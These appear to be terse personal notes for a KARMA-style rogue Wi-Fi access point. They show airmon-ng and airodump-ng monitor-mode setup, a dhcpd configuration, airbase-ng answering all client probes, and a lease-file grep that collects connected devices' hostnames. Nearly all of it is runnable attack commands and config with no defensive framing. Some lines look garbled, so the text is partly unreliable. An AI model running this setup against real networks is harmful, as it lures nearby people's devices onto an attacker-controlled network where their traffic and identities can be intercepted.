iwconfig
# iw reg Sept. BO
# iwconfig wlan1 txpower 30
# airmon-ng start wlan1
airmon-ng start wlan0
airodump-ng start <int> <ch>a
KARMA
Setup dhcp3
dhcpd.conf
subnet 192.168.9.0 netmask 255.255.255.0 {
range 192.168.9.20 192.168.9.100;
option routers 192.168.9.1;
option domain-name-servers 192.168.9.1;
}
option domain-name-servers 192.168.9.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
logfacility local7;
----------------------------------------------
touch /var/run/dhcpd.pid
chmod 777 /var/run/dhcpd.pid
--------------------------------------------------
# airbase-ng -P -v -a AA:AA:AA:AA:AA:AA mon0
# ifconfig at0 up 192.168.9.1 netmask 255.255.255.0
# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
# more /var/lib/dhcp3/dhcpd.leases |grep client-hostname | sort |uniq > /root/wifi-test.tan